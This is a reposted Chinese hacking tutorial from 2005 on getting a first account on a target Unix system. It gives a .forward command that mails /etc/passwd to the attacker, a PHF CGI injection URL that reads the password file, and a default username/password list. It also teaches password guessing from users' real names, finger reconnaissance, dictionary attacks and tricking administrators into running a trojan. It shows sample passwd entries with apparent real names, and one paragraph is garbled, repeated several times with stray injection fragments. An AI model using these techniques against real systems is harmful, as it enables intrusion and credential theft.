入侵系统获如何得第一个账号 |
http://web.any2000.com 时间:2005年6月15日 点击: 1722 来源:未知 |
确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,账号用ANONYMOUS或是FTP,密码用一个EMAIL账号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统账号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通账号放进去,这就是很重要的信息,虽然只有账号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo" /bin/cat /etc/passwd sed ‘s/^/ /‘ /bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。 如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些账号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些账号记下来,非常有用. 以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-< 还可以利用目标的FINGER功能来积累账号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了! 很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的账号,例如: 账号 密码 ----------- ---------------- root root sys sys/system/bin bin sys/bin mountfsys mountfsys adm adm uucp uucp nuucp anon anon anon user user games games install install reboot 给 "command login" 用的 demo demo umountfsys umountfsys sync sync admin admin guest guest daemon daemon ________________________________________________________________ 有些管理员忘记把他们改掉,那你就发财了! 另外还有一些习惯性账号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试. 只有账号还不能进入系统,但有了账号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道账号的那你应该会发现该用户的许多信息,例如: ......... xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh qingyuan:x:275:50::/usr/qingyuan:/bin/sh hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh ............ 这是一部分PASSWD,从这儿我们可以得到七个账号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的. 如果是用其他方法获得账号的,就用FINGER查询来获得相关信息.例如知道一个账号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该账号的信息例如真名实姓,电话号码等就用这些做密码来猜%22%3e如果是用其他方法获得账号的,就用FINGER查询来获得相关信息.例如知道一个账号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该账号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得账号的,就用FINGER查询来获得相关信息.例如知道一个账号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该账号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得账号的,就用FINGER查询来获得相关信息.例如知道一个账号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该账号的信息例如真名实姓,电话号码等就用这些做密码来猜 当然最可能的密码还是账号本身和一些账号的变形,如账号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的. 如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好. 最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了. 你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我。 |
联系客服